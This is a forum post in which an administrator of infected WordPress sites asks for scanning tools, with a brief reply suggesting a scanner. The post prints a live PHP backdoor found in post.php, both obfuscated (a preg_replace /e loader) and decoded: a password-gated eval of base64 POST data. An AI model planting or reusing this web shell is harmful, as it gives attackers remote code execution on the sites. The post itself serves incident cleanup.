Hi, I just made a new Debian 8 server to host some 15-16 wordpress sites... most of them had been compromised. I've updated the core/theme/plugins to the latest and cleaned some base64 files than I found the infected post.php has Expand: post.php Code: <?php $kAD4g2="\x70\x72".chr(101)."g_\x72e".chr(112)."\x6Ca".chr(99)."\x65";$qnVf5O=chr(101)."v\x61l".chr(40).chr(98)."a\x73\x65\x36\x34_\x64ec".chr(111)."\x64e\x28".chr(34)."\x51\x47".chr(86).chr(121).chr(99).chr(109)."\x39\x79".chr(88).chr(51).chr(74)."\x6c\x63".chr(71)."\x39\x79\x64G\x6C".chr(117)."Z".chr(121)."g\x77K\x54".chr(115).chr(75)."Q".chr(71)."l\x75a".chr(86)."\x39\x7aZX\x51\x6f".chr(73).chr(109).chr(82)."p".chr(99).chr(51)."\x42sY\x58\x6C\x66Z\x58J".chr(121)."b".chr(51)."\x4A\x7AI\x69".chr(119).chr(119)."K".chr(84)."\x73".chr(75).chr(81)."G".chr(108)."\x75".chr(97)."V".chr(57)."\x7A\x5A".chr(88).chr(81)."oI\x6dx".chr(118).chr(90).chr(49).chr(57)."lc\x6EJ".chr(118)."\x63nM\x69L".chr(68).chr(65)."p\x4F\x77\x70".chr(65)."\x61\x575".chr(112).chr(88)."\x33".chr(78)."l\x64\x43\x67\x69\x5A".chr(88).chr(74)."\x79".chr(98)."\x33\x4A\x66".chr(98).chr(71).chr(57)."n\x49".chr(105)."w\x77\x4bT\x73".chr(75)."C".chr(109)."lm\x49\x43\x68\x70c\x33".chr(78)."l\x64".chr(67).chr(103)."\x6b\x581".chr(66)."\x50".chr(85)."1".chr(81)."\x70\x49".chr(67)."Y\x6d".chr(73)."\x47l".chr(122).chr(88)."2F\x79\x63".chr(109)."F5\x4b\x43".chr(82).chr(102)."\x55\x45\x39T\x56".chr(67)."k".chr(103)."J".chr(105)."Y".chr(103)."\x592\x39".chr(49).chr(98)."\x6eQo\x4A\x46".chr(57).chr(81)."T1".chr(78)."\x55".chr(75)."T".chr(52).chr(120).chr(75)."\x51p".chr(55)."\x43\x67".chr(108)."mb".chr(51)."\x4A".chr(108)."\x59".chr(87)."\x4E\x6F".chr(73)."Cg".chr(107)."\x58\x31BP\x55".chr(49)."Q".chr(103).chr(89).chr(88)."M".chr(103)."\x4aHZ".chr(104)."\x63\x69".chr(107).chr(75)."\x43\x58s".chr(75)."\x43Q\x6C\x70".chr(90)."i".chr(65).chr(111)."I".chr(87)."\x6C".chr(122)."\x63\x32".chr(86)."\x30\x4B\x43\x52\x6ab\x32Rl\x4bS\x6b".chr(103).chr(74).chr(71)."\x4EvZ".chr(71)."\x55g\x50".chr(83).chr(65)."k".chr(100)."m\x46\x79O\x77\x6F\x4a\x43".chr(87)."\x56".chr(115)."\x63\x32\x56p\x5ai".chr(65).chr(111)."\x49".chr(87).chr(108)."z".chr(99).chr(50)."V0".chr(75).chr(67)."\x52w\x59\x58N".chr(122)."\x4bS\x6b\x67".chr(74)."H".chr(66)."\x68c\x33\x4Dg\x50S".chr(65)."k\x64m\x46y\x4F\x77o\x4AC\x57".chr(86).chr(115)."c\x32\x55".chr(103).chr(89)."\x6e\x4A\x6CY\x57\x73\x37".chr(67)."g".chr(108)."9".chr(67).chr(103)."o".chr(74).chr(97)."W\x59".chr(103)."\x4b".chr(67)."Rw\x59XNzID".chr(48)."\x39\x49CJ".chr(52)."cz\x4e".chr(73).chr(81)."\x56".chr(78)."\x75\x64\x55\x4a".chr(119)."\x63H".chr(99).chr(53)."\x64F\x52m\x53U".chr(49)."K\x4DW\x4A\x61Zz\x4a\x34".chr(81)."n\x4a".chr(121)."\x52".chr(108).chr(70)."\x6C\x57\x43\x49".chr(112)."C".chr(103)."l\x37Cg\x6B\x4AZ".chr(88)."Z\x68".chr(98)."\x43".chr(104)."\x69\x59\x58N".chr(108)."Nj\x52f".chr(90)."\x47".chr(86).chr(106)."\x62\x32".chr(82)."lKC".chr(82)."\x6ab2R\x6cK".chr(83)."\x6B7\x43".chr(103)."l9\x43\x6e0".chr(75)."Z".chr(88).chr(104)."pd\x44\x73".chr(61)."\x22".chr(41).")\x3b";$Qa7Ug="/".chr(100)."\x64b\x376d\x62".chr(53)."\x33".chr(51)."81".chr(100)."\x61d\x39\x38\x33".chr(100)."\x35\x64\x33\x319".chr(100)."\x38d".chr(101)."\x65\x66".chr(97)."6".chr(47)."\x65";$kAD4g2($Qa7Ug,$qnVf5O,"d\x64b\x37".chr(54).chr(100)."\x62".chr(53)."\x3338\x31d\x61\x649".chr(56).chr(51).chr(100)."\x35".chr(100)."\x3319".chr(100)."\x38\x64\x65\x65\x66".chr(97)."\x36"); ?> <?php @error_reporting(0); @ini_set("display_errors", 0); @ini_set("log_errors", 0); @ini_set("error_log", 0); if (isset($_POST) && is_array($_POST) && count($_POST) > 1) { foreach ($_POST as $var) { if (!isset($code)) $code = $var; elseif (!isset($pass)) $pass = $var; else break; } if ($pass == "xs3HASnuBppw9tTfIMJ1bZg2xBrrFQeX") { eval(base64_decode($code)); } } exit; Which unPHP.net decodes to PHP: <?php @error_reporting(0);@ini_set("display_errors", 0);@ini_set("log_errors", 0);@ini_set("error_log", 0);if (isset($_POST) && is_array($_POST) && count($_POST) > 1) { foreach ($_POST as $var) { if (!isset($code)) $code = $var; elseif (!isset($pass)) $pass = $var; else break; } if ($pass == "xs3HASnuBppw9tTfIMJ1bZg2xBrrFQeX") { eval(base64_decode($code)); }}exit; However in less than 10 hrs the Exim Mail queue shoots to above 20,000 which suggests there are still some malicious scripts lying deep under. Interestingly on one of the sites... I was not able to login with my admin user/pass at wp-admin. Suspecting infection, I reinstalled the WP core, Theme and Plugins (all latest from their respective web sources) without copying a single file from the backup dumps. I only imported Database. After 2 days, I was again not able to login into wp-admin. Funny, I can't login using firefox but chrome incognito lets me in. Don't know if that's something to do with infections or not. I installed Sucuri as well as Anti-Malware Security and Brute-Force Firewall plugins to scan one of the WP sites and it gives me a bunch of random files that sometimes have the base64 codes, but sometimes are clean. Scanning all 17-18 sites manually would be a pain... but will do if there isn't any better wholesome approach. Can you give me some good pointers where to start with a system wide scan and detection of malicious files ? 1. Use Maldet ? 2. ClamScan ? 3. Any other scanner than can deep scan filesystem and suggest the mischievous files ?
You should scan the whole website tree with ISPProtect https://ispprotect.com/. There is a free trial available that you can download use without registration.
